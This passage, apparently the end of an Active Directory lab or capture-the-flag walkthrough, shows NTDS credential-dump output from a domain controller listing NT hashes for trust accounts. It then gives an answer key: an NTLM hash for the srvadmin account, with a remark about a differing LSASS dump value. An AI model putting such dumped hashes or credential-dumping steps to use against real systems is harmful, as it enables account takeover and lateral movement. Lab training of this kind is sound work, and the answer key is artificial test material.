SMB         172.16.2.1      445    DCORP-DC         mcorp$:1103:aad3b435b51404eeaad3b435b51404ee:f5b5c9f1ca76187393db1d3bb8ded94e:::
SMB         172.16.2.1      445    DCORP-DC         US$:1104:aad3b435b51404eeaad3b435b51404ee:f85385d81cc4936d37ff8f27813f43c6:::
SMB         172.16.2.1      445    DCORP-DC         ecorp$:1112:aad3b435b51404eeaad3b435b51404ee:4501e4c7f30e1cb3c9886f06a3ed1c6a:::

```

Answer (the srvadmin value in the NTDS dump; note that the LSASS dump on dcorp-adminsrv above showed a98e18228819e8eec3dfa33cb68b0728 for the same account, so check which source the flag expects):

```
b38ff50264b74508085d82c69794a4d8
```
